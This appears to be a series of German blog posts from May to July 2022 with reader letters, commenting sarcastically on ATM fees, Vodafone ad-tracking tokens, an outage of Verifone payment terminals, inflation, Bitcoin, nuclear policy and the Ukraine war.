Aber da siehst du mal wieder, was für eine Servicewüste Deutschland ist. Dabei ginge es doch! Guckt nur, wie in kürzester Zeit überall Covid-Testcenter aus dem Boden sprossen. Und jetzt gibt es in Imbissen und Spätis so unseriöse Geldautomaten, die schon voll unsicher aussehen, von keiner namhaften Bank betrieben werden, und wenn du deine Karte reinsteckst, dann wollen die erst die Pin haben, bevor sie dir sagen, wieviel Gebühren das kosten wird. Was für eine bodenlose Frechheit.
Wisst ihr, was ich mich heute gefragt habe? Wieso nicht an jeder Packstation per Gesetz ein Geldautomat zu sein hat. Die Packstationen belästigen einen gerade auf jedem zweiten Supermarktparkplatz und auch in dieser Postfiliale heute stand eine Packstation, wahrscheinlich da wo früher weitere Geldautomaten standen.
Update: Ein Leser berichtet aus Finnland:
habe 2010 in Finnland gelebt, dort war dein bester Freund der OTTO, wenn du Geld brauchtest. Das ist eine staatliche Infrastruktur an Geldautomaten, da konntest du kostenlos abheben, egal bei welcher Bank du bist, auch ich als Kunde einer deutschen Bank. Da habe ich erst verstanden, was für ein irrsinniges System das in Deutschland ist, dass jede Bank ihre eigenen Automaten aufstellt und Gebühren für Kunden anderer Banken verlangt. Bestärkt mich in der Meinung, der Staat muss für Infrastruktur und Standards sorgen, die freie Wirtschaft ist nicht imstande sinnvolle Lösungen zu entwickeln.
Heute habe ich auch keinen kostenlosen Automaten mehr in der Nähe und hebe öfter beim Einkaufen an der Supermarktkasse ab, das geht inzwischen fast überall... was natürlich aus naheliegenden Gründen auch nicht optimal ist.
Update: Mehrere Leser empfehlen ein Konto bei der DKB, oder dass ich beim Supermarkt an der Kasse abhebe (wohl ab einem Mindestkaufwert von 5 oder 10 Euro oder so).
Andere Leser meinen, dass offenbar in Deutschland ca pro Tag ein Geldautomat gesprengt wird. In NRW wohl deutlich häufiger als in Berlin.

Wed Jul 13 2022

[l] Ihr ahnt ja nicht, was die gerade rausgefunden haben!
Unter Windows und Macos können Anwendungen einfach so auf die Kamera zugreifen!
Das hat bestimmt die CIA herausgefunden. Die finden ja alles raus. Alles finden die raus!
Hey, ARD, habt ihr euch mal gefragt, wieso Nerds sich seit gefühlt 100 Jahren die Kameras auf ihren Laptops abkleben? Wieso einschlägige Nerd-Shops Kamera-Verdeck-Sets verkaufen?
Ja Scheiße, Bernd! Hättet ihr mal zugehört, als wir euch das wieder und wieder zu erklären versucht haben. Aber da habt ihr lieber einen auf "ich bin klein und dumm und verstehe die ganze Technik eh nicht" gemacht. Auf "kannst du mir mal helfen, die USB-Tastatur zu installieren".

Mon Jul 4 2022

[l] Kennt ihr Starship Troopers? Von 1997?
Ich hab neulich bei der Bundeswehrwerbung "WOULD YOU LIKE TO KNOW MORE?" drangeschrieben, das kommt aus dem Film.
Der ist damals gewaltig gefloppt. Die Kritiker haben ihn in der Luft zerrissen. Die haben nicht gemerkt, dass das Satire ist.
Das ist einer von diesen Filmen, die man mehrfach gucken muss, bevor man alles mitkriegt.
Wenn ihr den also noch gar nicht geguckt habt, oder nur einmal als ihr jung wart, und ihn da grottenschlecht fandet, weil es so plumper Hurra-Militärpatriotismus ist und die Protagonisten alle auf Telenovela-Niveau herumholzen, dann solltet ihr dem Film vielleicht nochmal eine Chance geben.
Beim Blättern auf IMDB und Wikipedia habe ich kürzlich erst erfahren, dass Paul Verhoeven noch jüngere Infanteristen haben wollte. Er fand, dass im Krieg Kindersoldaten sterben, nicht Erwachsene. Das Studio ließ ihn nicht.
In Deutschland war die Synchronisation sinnentstellend. Guckt das also lieber im Original.
Die Jugendschützer in Deutschland haben das auch nicht verstanden, dass es sich um Satire handelt, und haben den Film indiziert. 2017 wurde er dann ungeschnitten ab 16 freigegeben.
Achtung: Die haben da noch mehrere Sequels gemacht, und eine Fernsehserie. Ich rede hier von dem ursprünglichen Film, ohne Sequel-Nummer dran.

Sat Jul 2 2022

[l] Infrastrukturapokalypse:
Wegen des weltweiten Kunststoffmangels könnten in Berlin in den kommenden Monaten Millionen Gelbe Säcke zur Wertstoffsammlung fehlen. Seit Wochen seien sie an den offiziellen Ausgabestellen kaum noch zu bekommen
Hey, wisst ihr noch, wie wir uns über die Verhältnisse in Italien lustig gemacht haben, als bei denen niemand den Müll abgeholt hat?

Tue Jun 21 2022

[l] Die Briten wollen übrigens ihre Bahn verstaatlichen.
Wenn sie schon dabei sind, gibt es bestimmt noch ein paar andere Thatcher-Errungenschaften, die man mal zurückrollen sollte.
Update: Oh, ein paar Leser weisen darauf hin, dass nicht Thatcher sondern Blair die Bahn privatisiert hat. Wusste ich nicht.
Update: Wikipedia sagt, Thatcher habe angefangen und John Major hat es vollendet.
Update: Ein Leser formuliert aus:
1) Die Privatisierung der Eisenbahnen war EXPLIZIT KEIN Thema für Margaret Thatcher, weil für sie die Gewerkschaft der Eisenbahner im UK tendenziell die "gefährlichste" aller Gewerkschaften war. Sie war zwar keine Freundin von British Rail, hat aber die Privatisierung der Eisenbahn nicht vorangetrieben. Die Privatisierung von BR war eher eine "Verzweiflungsankündigung" im Wahlkampf von John Major, bei dem man nicht mit einem Sieg rechnete. Und dieser musste dann die Privatisierung in einem Hauruck-Verfahren umsetzen (er musste "liefern").
2) Es handelt sich bei der Bildung von GBR auch nicht um eine Rückverstaatlichung. Vielmehr wird die Art und Weise der Bestellung von Verkehrsleistungen von den Unternehmen zurück in die Hände des DfT gelegt. Damit nähert sich das System der Eisenbahnen sehr stark dem Modell des deutschen Regionalverkehrs, bei dem die Bestellung der Leistungen auch eher staatlich "gesteuert" wird. Die Briten haben in den letzten Jahren schon positive Erfahrungen mit diesem Modell im Großraum London gemacht und denen es nun über das Land aus.
Im Übrigen ist die Infrastruktur schon seit über 20 Jahren im UK wieder verstaatlicht.

Sat Jun 18 2022

[l] Hmm, Bitcoin ist jetzt unter 18k. Kam von 57k.
Na da hat sich ja mein Vortrag richtig gelohnt, wenn ihr da eure Einstellung geändert habt und ausgestiegen seid.
Ich freu mich ja bei Kursausschlägen auf Spekulationsobjekten immer über die "Experten" und ihre "Erklärungen". Heise zitiert hier ein schönes Beispiel:
Krypto-Experte Timo Emden von Emden-Research nannte darüber hinaus handelstechnische Gründe für den erneuten Kurseinbruch. "Das vergleichsweise geringe Handelsvolumen über das Wochenende könnte die Talfahrt angestoßen haben", heißt es in einem Kommentar.
Oh ach SO funktioniert das!1!! Der Kurs geht gar nicht runter, weil alle verkaufen. Nein, nein! Das geringe Handelsvolumen lässt den Kurs runtergehen!
Boah, also da bin ich ja bisher von völlig falschen Voraussetzungen ausgegangen!1!!
Wo finden die bitte solche Leute?! Oh, Sekunde, das kann ich aufklären:
Timo Emden ist studierter Betriebswirt, B.A., Marktanalyst und zertifizierter Blockchain-Experte der Frankfurt School of Finance & Management.
Ach. Ach was. Zertifizierter Blockchain-Experte der Frankfurt School of Finance!
Um Ausreden ist der gute Mann jedenfalls nicht verlegen. Mal ist es das geringe Handelsvolumen, mal ist es Celsius, dann ist es Angst vor Leitzinserhöhungen, oder Elon Musk. Ist Bitcoin vielleicht einfach zu riskant? Keine Sorge, denn Anleger suchen das Risiko!
Scheiße, Bernd, hätte ich mal auch einen Blockchain-Abschluss an der Frankfurt School gemacht! Das scheint einen ja fast so exzellen vorzubereiten wie ein Abschluss an der Henri-Nannen-Schule!
Research! Dass ich nicht lache.

Thu Jun 2 2022

[l] Gute Laune? Da kann ich abhelfen! ARD-Umfrage: Mehrheit erstmalig für weitere Stationierung amerikanischer Atomwaffen auf deutschem Boden.
War jemand von euch bei den Protesten gegen die Pershing II dabei? Inzwischen geht es ja nicht mehr um Raketen sondern um die sogenannte "nukleare Teilhabe", d.h. amerikanische Bomben an deutschen Flugzeugen. Deutschland nuked die Russen mit amerikanischen Nukes.
Ich weiß ja nicht, ob ihr euch mal Gedanken gemacht habt, wie so ein Krieg im Zweifelsfall ablaufen würde. Was ist das erste Ziel in einem Krieg mit Massenvernichtungswaffen? Die gegnerischen Massenvernichtungswaffen! Das ist mal eine ganz tolle Idee, die bei uns stationiert zu haben!1!!
Update: Damit das niemand versehentlich überliest:
Besonders groß ist in der aktuellen Umfrage im Auftrag von Panorama die Zustimmung zu US-Atomwaffen bei den Anhängerinnen und Anhängern von Bündnis 90/Die Grünen: 64 Prozent sprechen sich für den Erhalt oder sogar die Aufstockung der US-Atombomben in Deutschland aus.

Mon May 30 2022

[l] Habt ihr einen Adblocker? Tracking Protection? Immer schön überall opt-out gemacht?
Habt ihr vielleicht extra ein Apple-Gerät gekauft, weil ihr gehört habt, dass die eure Daten schützen?
Dann seid ihr hoffentlich nicht Vodafone-Kunde, denn Vodafone will jetzt an eure Mobilfunk-Internetzugriff ein eindeutiges Token ranpacken, damit die Werbemafia euch besser ausschlachten kann. Hier sind die Details.
Warum? Weil, äh, "Keeping the Internet free"!1!!
Wie? Nein, nicht free im Sinne von frei. free im Sinne von kostenlos! Die arme darbende Werbemafia hat operative Supply-Chain-Herausforderungen bei der Koksbeschaffung, und wenn denen keiner hilft, dann gehen die alle pleite! Und wer soll denn dann den Mittelstand und die Konzerne zur Ader lassen?! Damit wollten sich die Vodafone-Schlipse doch die Rente sichern!1!!
Update: Laut Torsten Kleinz testet das auch die Telekom gerade.

Thu May 26 2022

[l] Diese Bezahlterminals sind immer noch kaputt.
Damit dampft sich die Liste der Möglichkeiten ein, was da passiert sein könnte.
Es handelt sich um Verifone H5000, die sind angeblich 2012 erstmals in Verkehr gebracht worden. Damit ist die naheliegende Erklärung: Das CA-Zertifikat ist abgelaufen.
Das würde erklären, wieso die alle auf einmal ausfallen, und wieso das nicht am nächsten Tag gefixt ist. Wenn das CA-Zertifikat abgelaufen ist, kann das Gerät auch keine Signatur unter einem neuen BIOS autentisieren, oder Admin-Logins, um ein neues BIOS einzuspielen.
Dann werden die jetzt im Netz die Zeit zurückdrehen müssen, um die alte CA wieder zu reaktivieren, was natürlich einen Haufen anderer Probleme macht, und eigentlich gar nicht gehen sollte, weil, äh, das könnten ja auch Angreifer machen sonst.
Man würde denken, dass so ein Pfusch gar nicht erst am Regulator vorbeikommt, aber dann fällt einem auf, dass der Regulator die Bafin ist, und was die beruflich machen habe ich auch noch nicht herausgefunden. Regulieren jedenfalls nicht.
Bleibt die Frage, wieso die Supermärkte ihre Terminals nicht rebooten sollen. Das könnte bedeuten, dass deren Zertifikats-Prüfung nur beim Aufbau der Verbindung gemacht wird. Wenn die gar keine Zeit aus dem Netz beziehen, aus Sicherheitsgründen durchaus sinnvoll bei sowas, dann hat der Hersteller jetzt die Arschkarte. Das würde erklären, wieso der im Moment nicht auf Presseanfragen reagiert.
Update: Offenbar hat ausnahmsweise nicht die Bafin verkackt sondern "Die Deutsche Kreditwirtschaft". Die Webseite sieht aus wie eine Lobbygruppe aber das ist der Kabal, der seit den 1980ern für tolle Entscheidungen wie "HBCI braucht keiner mehr" verantwortlich ist.
Das macht die Sache ja noch viel süßer, wenn die Banken sich da selbst in den Fuß geschossen haben.
Update: Es gibt noch einen Player, der auf dem Weg die Hand aufgehalten hat.
Update: Hier gibt es eine Bestätigung für die Zertifikats-Theorie:
"Aufgrund eines Zertifikatsfehlers wird es nach aktuellem Stand nötig sein, auf allen H5000-Terminals neue Softwareupdates einzuspielen", heißt es.
Verifone arbeite daran, heißt es weiter, die neue Softwareversion verfügbar zu machen. Die ist noch nicht verfügbar. Die haben noch kein Update.
Update: Auf Twitter gerüchtet jemand, es habe ein Update gegeben, Weihnachten 2021. Wo sie das nicht ausgerollt haben, ist jetzt halt das Terminal tot.
Update: Hier hat jemand ein paar Screenshots eines betroffenen Geräts und das scheint meine Theorie weitgehend zu bestätigen.

Mon May 23 2022

[l] Zu der Inflation gerade möchte ich mal ein paar Thesen in den Raum stellen.
Erstens: Vergesst mal die aktuellen Preise, wie teuer alles wird. Denkt mal lieber über eure Altersvorsorge nach. Wenn ihr, sagen wir mal, eine Rentenversicherung abgeschlossen habt, die euch garantiert 400 Euro im Monat auszahlt, und wir haben jetzt eine Weile 7-10% Inflation, dann kriegt ihr vielleicht 400 Euro, aber die sind viel weniger wert dann.
Zweitens: Inflation kann man als Selbstkorrekturmechanismus verstehen. Der Staat schiebt unfassbar große Schuldenberge vor sich her, weil Geld immer als Kredit geschöpft wird. Auf der einen Seite hat jemand Guthaben, dann muss auf der anderen Seite jemand Schulden haben. Die Schuldenseite ist bei uns häufig der Staat.
Daher argumentieren Ökonomen gerne, dass das OK oder sogar gut sei, wenn der Staat hohe Schulden hat, weil das heißt, dass jemand anderes ein hohes Guthaben hat.
Nun machen aber zu hohe Schulden irgendwann Ärger, und wie kriegt der Staat die dann weg? Abzahlen ist nicht realistisch. Der Ausweg ist Inflation. Da gehen die Schulden nicht weg, aber sie sind halt weniger wert. Ich erwähne das, weil viele Leute jetzt annehmen, dass der Staat die Inflation schnellstmöglich wieder runterfahren wird. Mal abgesehen davon, dass das gar nicht so einfach ist, möchte ich hier anmerken, dass der Staat möglicherweise gar keine große Eile hat, die Inflation herunterzufahren, weil das eben auch die Schulden weniger wert werden lässt.
Update: Einen Aspekt hab ich noch vergessen. Einer der Nachteile von Inflation ist, dass die Zinsen bei Neukrediten hochgehen, sonst machen die Anleger ja Verlust. Deutschland sitzt in der EU aber in einer Situation, wo andere EU-Länder sich gegen Importe aus Deutschland nicht mit Zöllen wehren können, weshalb die anderen EU-Länder gegenüber Export-Deutschland ein Handelsdefizit haben. Da kommt man so leicht gar nicht wieder raus, aus der Situation, daher wollen Kreditgeber von denen höhere Zinsen sehen. Wenn die guten Investments austrockneten, bleibt Deutschland als "sicherer Hafen". Deutschland kann jetzt für Null-Zinsen Kredite aufnehmen.
Das heißt: Wenn wir Inflation haben, aber immer noch für Nullzinsen Staatsverschuldung aufnehmen können, hat der Staat erst Recht keinen Anreiz, etwas gegen die Inflation zu tun.
Update: Oh, eine Sache noch. Die Geldpolitik wird bei uns zumindest auf dem Papier nicht von der Politik gemacht, sondern von den Notenbanken, also in unserem Fall von der EZB. Deren eine Aufgabe ist: Inflation bei 2% halten. Das hat sie nicht gemacht, daher dieser Blogpost. Die EZB ist zwar auf dem Papier unabhängig, aber natürlich auch dem öffentlichen Druck ausgesetzt, von den Medien und der Politik.
Update: Einige Leser wenden ein, dass diese Inflation nicht von "zuviel Geld" kam (was die EZB kontrollieren kann), sondern von "zuwenig Güter wegen Supply-Chain-Fuckups" (was außerhalb von deren Einflussbereich liegt).

Wed May 18 2022

[l] Ein Leser schreibt mir gerade, dass sie im Fernsehen in Russland gesagt haben, wie sie mit den Kriegsgefangenen aus dem Stahlwerk weitermachen wollen.
Sie wollen gucken, wer davon für Kriegsverbrechen verantwortlich sind. Weniger Belastete wollen sie gegen russische Kriegsgefangene austauschen, den anderen den Prozess machen.
Na DAS wird ja ein Spektakel, wenn sich jetzt auf beiden Seiten der Grenze Gerichte einen Rechtsstaat-Off liefern. Im laufenden Krieg Kriegsverbrechen untersuchen funktioniert bestimmt auch ganz super. Wird bestimmt auf beiden Seiten total fair and balanced.
Update: Ein Leser ergänzt:
ich würde das jetzt nicht auf die Kriegsverbrechen aus dem laufenden Krieg eingrenzen. Seit 2014 gab es ja immer wieder (gegenseitigen) Beschuss und die Berichterstattung der russischen Seite hatte außer der Beschreibung welche zivile Infrastruktur und zivile Opfer im Donbas gerade zu beklagen sind auch welche militärische Einheit/Offizier für den Beschuss namentlich verantwortlich gemacht wird. Der Satz „Dies wird als Kriegsverbrechen erachtet und [die zuständige Behörde] hat Ermittlungen aufgenommen“ war in den letzten Jahren immer wieder zu hören (natürlich nicht in der Tagesschau).
Die müssen nicht erst spontan „gucken“, die werden vorbereitete dicke Akten auf den Tisch legen.
[l] Hier ist einer für Freunde des gepflegten Auffahrunfalls: Wenn du Politologen zu Datenbanken befragst.
Ich weiß gar nicht, wo ich da anfangen soll. Würde mich wundern, wenn sie aus der Unglücksstelle noch Überlebende rausziehen können.
So langsam hab ich den Eindruck, die jüngeren Generationen können die Welt überhaupt nur noch durch den Zerrspiegel der Unterdrückung betrachten. Daher muss das jetzt fair heißen, obwohl es überhaupt nichts mit Fairness zu tun hat.
Das Problem, das sie haben, ist dass sie Digitalisierung machen wollten, und dann einfach ein Gesetz gemacht haben, dass das bis dannunddann fertig sein soll. Der Rest ist nicht unser Problem!1!!
Ich las vor Jahren mal eine Liste von absurden Gesetzen. Da war eines bei, das ein Dorf dem Fluss vorgeschrieben hat, dass das Hochwasser höchstens bis zu diesem Strich hier steigen darf. Klingt für mich ähnlich durchdacht wie die Digitalstrategie der Bundesregierung.
Nun haben wir hier ein föderales System und jedes blöde Bundesland hat sich ihre eigenen Datenformate und Datenbanklayouts ausgedacht und das ist alles überhaupt nicht interoperabel und daher scheitert gerade die Digitalisierung. Halte ich ja für eine Legende, ehrlich gesagt. Ja klar, schön ist das nicht. Aber das Problem im Moment ist nicht, dass das Formular in jedem Bundesland subtil anders aussieht, sondern dass es gar kein Formular gibt!
Jedenfalls könnt ihr mal diesem FAIR-Zeug hinterhergoogeln. Ich habe da noch nie von gehört. Wenn man das mal googelt, beschaffen sich damit aber anscheinend schon seit Jahren irgendwelche vierklassigen Uni-Institute ihre Drittmittel. Hier ist ein schönes Beispiel:
The FAIR Digital Object Framework (FDOF) is a framework which defines a model to represent objects in a digital environment.
Ohooo! Gut, dass wir das mal geklärt haben! Ich kriege Flashbacks von 2005.
Es liest sich für mich, als wolle jemand eine universelle Beschreibungssprache für Adapter und Konvertierungen schaffen. Da kannst du deine Daten reintun, egal in welchem Format sie vorliegen, und dann kann automatisch der Content rausgepopelt werden. Klingt für mich wie eine Bankrotterklärung. Das machst du, wenn du überhaupt keinen Hebel hast, um die Leute zur Adoption eines gemeinsamen Standards zu bringen. Und das wird uns jetzt hier von den Leuten verkauft, DIE DIE FUCKING GESETZE MACHEN. Schreibt da halt rein, ihr wollt das in Format XY. Fertig.
Update: Wer sich übrigens denkt, dass das ein Fall für RDF ist, der hat Recht. Aus dem Kleingedruckten oben:
Therefore, the FDOF-IR MUST be presented as RDF, minimally using the Turtle and JSON-LD syntaxes.
Aus meiner Sicht ist das eine Externalisierung der IT-Kosten an die Zukunft. Wir haben keinen Bock, das ordentlich zu machen. Scheiß drauf. Schafft Arbeitsplätze in der Zukunft!1!!
[l] Ihr müsst jetzt alle sehr tapfer sein: In China wird trotz Crypto-Mining-Verbot heimlich weitergemacht.
I'm shocked, shocked!, to find that mining is going on in here!

Thu May 12 2022

[l] Ich habe ja noch nie verstanden, was für Leute Software kaufen, die ohne Echtzeit-Placet des Herstellers zu funktionieren aufhört und/oder nicht gewartet werden kann. Diverse Hersteller machen sowas heutzutage, nicht nur von Software, auch von Hardware. Wir hatten neulich die Traktoren, aber das betrifft auch Maschinenbauer-Großmaschinen, inzwischen auch Autos.
Wieso habt ihr diese Leute nicht mit Mistgabeln aus der Stadt getrieben?
Das war doch klar, dass wenn ihr das einem durchgehen lasst, dass das dann alle anderen auch machen?
Ich spreche das an, weil den Russen gerade auffällt, dass mit dem Rückzug von Siemens aus ihrem Land auch deren CAD-Software nicht mehr geht. Ja super! Wer kauft denn bitte sowas?! Wenn es einen Markt für CAD ohne Gängelscheiß gäbe, gäbe es da Player, und es könnte sich sowas hier kein Hersteller leisten!
Tja. Ich hab da immer Null Mitleid. Auch nicht bei den Unis. Du schläfst in dem Bett, dass du dir gemacht hast. So ist das im Leben.
Ich versteh ja auch nicht, wieso die Kreativbranche sich von Adobe so hat in die Abofalle hat herden lassen. Wenn das keiner mitgemacht hätte, wäre das aber ganz schnell wieder in der Schublade verschwunden.
[l] Leserbrief zur Frage, ob Militärs oder Zivilisten kriegerischer sind:
Erstens: Ich bin selbst Reserve-Offizier und würde instinktiv unterschreiben, dass Soldaten für Frieden sehr, sehr offen sind. Macht auch Sinn - die sind die ersten, die in persönliche Gefahr geraten.
Zweitens: Unser Lehrstuhl hat lange gemeinsam mit der Bundeswehr gemeinsam Seminare zum Einsatzrecht gemacht. Das Konzept war, Bundeswehr-Juristen, aktive Soldaten in mittleren Befehlshaber-Positionen und Studierende zusammen zu setzen und Rechtsfragen debattieren zu lassen.
Interessanterweise war bei den theoretischen Szenarien ("Darf man da jetzt schießen oder nicht?") die "blutrünstigste" Gruppe die der Studierenden. Die zurückhaltendste die der aktiven Offiziere. Da die aus aller Herren NATO-Länder zusammenkamen möchte ich ergänzen: Insbesondere die Deutschen.
Argumentation war häufig: "Naja, vielleicht dürfte ich jetzt [schon] schießen, aber ich würde vorher noch diesen und jenen De-Eskalationsschritt probieren wollen." Das ist sicher Teilstreitkraft- und Situationsabhängig, aber es gibt ne Menge militärische Entscheider, die lieber noch dreimal warnen, als einmal zu früh zu eskalieren.
Ich würde mich dem anderen Leserbrief-Schreiber anschließen und vermuten, dass es vor allem darauf ankommt, ob man mal auf nem Schlachtfeld tief durchgeatmet hat, oder nicht.
Das ist nicht die erste Frage, bei der ich meine Meinung zur Bundeswehr fundamental überdenken musste. Ich bin wie gesagt auch immer gegen Zwangswehrdienst gewesen, weil ich dachte, es trainiert unschuldigen Jugendliche zum Töten und bringt sie mit anderen Leuten zusammen, die auch gerne mal jemanden töten wollen.
Bis mir jemand erzählt hat, dass das eigentlich andersherum ist. Wenn du keine Wehrpflicht hast, dann kommen nur Freiwillige zur Armee, und DAS sind dann die Leute, die schon immer mal jemanden umbringen wollten.
Aus der Perspektive ist Wehrpflicht kein Mittel, um Jugendliche zu Mördern zu machen, sondern um potentielle Soziopathen mit den Werten aus dem gesellschaftlichem Konsens in Berührung zu bringen.
Ist halt meistens im Leben nicht so einfach, wie man sich das initial macht.

Tue May 10 2022

[l] Schlagzeile der Woche: Spaniens Geheimdienstchefin wegen Bespitzelung entlassen. Der Geheimdienst hatte mit der isarelischen Spionagesoftware Pegasus katalanische Separatisten bespitzelt.
Das klingt jetzt erstmal, als habe die halt ihren Job gemacht. Genau dafür hat man schließlich Geheimdienste, damit die illegale Dinge tun können, ohne rechtlich belangt zu werden.
Die Aufklärung kommt dann im Fließtext:
Die als «Catalangate» bezeichnete Affäre bedroht die Stabilität der Minderheitsregierung von Ministerpräsident Pedro Sánchez. Er ist im Parlament auf die Stimmen katalanischer Separatisten angewiesen
ACH SO ist das! Ja gut. Dann leuchtet das ein. (Danke, Uwe)

Sat May 7 2022

[l] Kleine Geschichte am Rande (hatte ich auch schonmal im Blog).
Der Putin ist ja eher Traditionalist. Die Strategie, den Westen glauben zu lassen, Putin sei durchgeknallt und unberechenbar und drohe mit Atomschlägen, die wirkt vielleicht auf den einen oder anderen von euch innovativ.
Ist sie nicht. Nixon fuhr gegen die Sowjets die "madman theory". Die Idee war damals, die Russen glauben zu lassen, dass Nixon kurz vor dem Zusammenbruch steht, weil er den Vietnam-Krieg nicht beenden kann, und wenn die jetzt nicht GANZ schnell eine für Nixon akzeptable Lösung finden, dann drückt der Verrückte auf den roten Knopf und wir sind alle tot. Money Quote:
I call it the Madman Theory, Bob. I want the North Vietnamese to believe I've reached the point where I might do anything to stop the war. We'll just slip the word to them that, "for God's sake, you know Nixon is obsessed about communism. We can't restrain him when he's angry—and he has his hand on the nuclear button" and Ho Chi Minh himself will be in Paris in two days begging for peace.
Nun musste sich Nixon dafür nicht sonderlich verstellen. Der Mann war alkoholkrank und hatte Schlafstörungen und Depressionen und nahm dafür Pillen, mixte gar die Pillen und Alkohol. Aber die Amis haben keine halben Sachen gemacht. Die haben 18 Atombomber über der Arktis kreisen lassen, und zwar möglichst offen und erkennbar für die Russen.
Wenn man grob die Eskalationsstufen vergleicht, findet man Übereinstimmungen. Russland hat neulich den schwedischen Luftraum verletzt und die Schweden erinnern sich noch an den simulierten Atomangriff 2013. Dann die Ankündigung, jetzt auch das strategische Nukleararsenal in Bereitschaft zu versetzen.
Nixon hat übrigens auch überlegt, der Zivilbevölkerung Vietnams offen mit Vernichtung zu drohen, über Atombomben, Deich-Zerstörung, Hafen-Verminung und ähnliche Maßnahmen. Da gab es dann Debatten mit Kissinger, wie weit man die Drohungen denn umsetzen wolle, wenn die Vietnamesen nicht spuren. Am Ende hat Kissinger (!!) davon abgeraten. Du weißt, dass du dich verrannt hast, wenn dein Vorschlag Kissinger zu extrem ist.
Jedenfalls ... hat das denn damals funktioniert? Kommt drauf an, wie man das sieht. Die Sowjets und Nordvietnamesen haben den Bluff nicht geschluckt. Die haben das gesehen und nicht reagiert. Nach drei Wochen hat Nixon das dann eingestellt. Allerdings hat daran wohl die Friedensbewegung in den USA eine große Rolle gespielt, denn die Sowjets konnten sehen, dass die Bevölkerung der USA nicht hinter militärischer Eskalation steht, weder nuklear noch konventionell.
Das wäre dann auch die offensichtliche Lektion an dieser Stelle. Diese Zeiten verlangen nach mehr Friedensbewegung und weniger Eskalation.

Fri May 6 2022

[l] Mir schrieb übrigens noch ein Völkerrechtler, dass das Papier des wissenschaftlichen Dienstes wohl einer eine Einzelposition vertrete. Der Rest der Völkerrechtler sieht da wohl eher kein Problem damit, eine Kriegspartei mit Waffen zu beliefern.
Ich bin ja immer wieder erstaunt, dass Völkerrechtler gut schlafen können. Ich meine, am Ende des Tages spielt doch keine Rolle, was ein paar westliche Völkerrechtler finden, sondern was Putin findet.
Ich weiß nicht, wie ihr das sehen würdet, aber wenn ich Putin wäre, und ich überfalle gerade ein Land, und es läuft nicht so gut, weil Deutschland Waffen liefert, dann würde ich das möglicherweise eher nicht so sehen, dass Deutschland sich durch die Lieferungen nicht zur Kriegspartei gemacht hat. Putin hat ja auch bei seinen anderen Positionen zur Ukraine eher nicht so die Mehrheitsmeinung übernommen bisher.
Ich weiß nicht, ob ihr alle einfach nicht alt genug seid, um das Gefühl miterlebt zu haben, dass jederzeit eine Atombombe vom Himmel fallen und uns alle umbringen kann. Ihr geht mir hier alle viel zu leichtfertig mit dem Risiko für einen Atomkrieg um.
Klar, Putin hat bisher noch nicht den roten Knopf gedrückt, obwohl die Nato wenig unversucht lässt, um ihn ausreichend zu provozieren. Den Amis kann das ja auch egal sein, die Nukes würden ja vermutlich erstmal in unsere Richtung gehen, nicht in ihre.
Leute, das ist nukleares Höllenfeuer, mit dem ihr da spielt!
Mir wäre manchmal echt lieber, wenn wir hier weniger Christen und mehr Buddhisten hätten, bei denen in die Entscheidungsfindung einfließt, dass sie nach der Wiedergeburt dann in verstrahlter Ödnis leben müssten.
Ja. Bisher war nur ein Land barbarisch und menschenverachtend genug, die Atombombe im Krieg einzusetzen. Und das ist lange her. Woher nehmt ihr eure Gewissheit, dass es dabei bleiben muss?!
Mal ganz doof jetzt: Nehmen wir an, ihr seid die Amerikaner. Putin nuked Berlin, einen Nato-Partner. Noch stehen Washington und New York. Wenn ihr jetzt zurücknuked, stehen die nicht mehr. Würdet ihr dann Moskau nuken?! Eher nicht, oder? Bündnisse sind schön und gut, aber ich setze doch nicht meine eigene Bevölkerung der atomaren Vernichtung aus, nur weil Putin am Rad dreht!
Was wenn Putin sich das auch so überlegt hat? Was wenn der sich nur Sorgen vor britischen und französischen Nukes hat? Was wenn er für die einen Plan hat? Sind ja nicht so viele.
Aber Fefe! Das wäre doch eine echt blöde Entscheidung von Putin! Was wenn die Amis doch zurücknuken?
Zu der Frage möchte ich gerne Exhibit A vorlegen: Putin hat auch beim Einmarsch in die Ukraine einige Dinge rückblickend falsch eingeschätzt.
Eure Zuversicht hätte ich gerne. Echt mal.
Würde mich persönlich wirklich freuen, wenn ihr mal alle ein bisschen die Füße stillhalten würdet. Und wenn wir unser Hirnschmalz nicht in die Frage investieren würden, welche Waffen man am besten in die Ukraine liefert, um diesen Krieg zu verlängern, sondern wie man diesen Krieg möglichst schnell beenden kann, bevor noch mehr Menschen sterben.
[l] Leserbrief zu der Artillerie für die Ukraine:
Bin ein ehemaliger Munitionskanonier (Grundwehrdienst), also unterste Ebene auf dem Gerät :-)
(Siehe ca ab minute 3: https://www.youtube.com/watch?v=xq3vBB7dNws)
In 6 Wochen (aus Komandant-Sichtweise) lernst du das aller nötigste wenn überhaupt.
Du brauchst jenanden der das Ding fährt, einen Kommandant und einen Munitionskanonier (wenn alles gut läuft. (Natürlich auch noch Munition inkl. Treibladung)
Abgesehen davon gehöhrt zu jeder Kompanie noch Wetteraufklärung und ein Feuerleitsystem (Joined-Fire) (das sind separate Gruppen/"Teams" inkl. Gerät). Wie das gemacht wird wurde auch nicht gesagt, richtig?
Keine Ahnung was die sich da wieder gedacht haben aber mein limitiertes Wissen aus den 6 Monaten(!) die ich da war.... das wird abenteurlich. Das sind doch fahrende Zielscheiben behaupte ich....
Aber Hauptsache bei uns macht sich niemand die Hände schmutzig und wir heizen die Situation weiter an...
Dieses Fahrzeug ist für mich im übrigen der Grund gewesen warum es niemals Krieg geben sollte. Das Teil schießt in einer Frequenz die 40kg Geschosse... ich will nicht auf der anderen Seite stehen.
Update: Mehrere andere Leser meinen, dass die Ukrainer ja keine Wehrpflichtigen ohne vorherigen Waffenkontakt sind sondern bereits an der Artillerie sowjetischer Bauart geschult sind, und man daher die Schätzung hier in der Praxis deutlich reduzieren kann. Genaues weiß natürlich niemand wirklich.
Ein anderer Leser hat auf Wikipedia einen Munitionstyp mit über 100km Distanz gefunden. Das ist absurd viel, finde ich. GPS-gesteuerte Munition. What the fuck?

Wed May 4 2022

[l] Habt ihr schonmal von Yandex gehört? Das ist sowas wie Google + Yahoo aus Russland. Ich verwende manchmal deren Übersetzerservice, wenn ich russische Texte lesen will.
Die haben ein Rechenzentrum in Finnland. Das läuft gerade auf Diesel, weil Finnland den Strom abgedreht hat. Sanktionen und so.
Doch dann gibt es in dem Artikel dieses Detail:
Yandex is registered in the Netherlands for tax purposes, so sanctioned individuals can no longer work there.
Warte mal. Wenn es in den Niederlanden registriert ist, wieso fällt es dann überhaupt unter Russland-Sanktionen? Ich dachte, das wird am Firmensitz festgemacht?
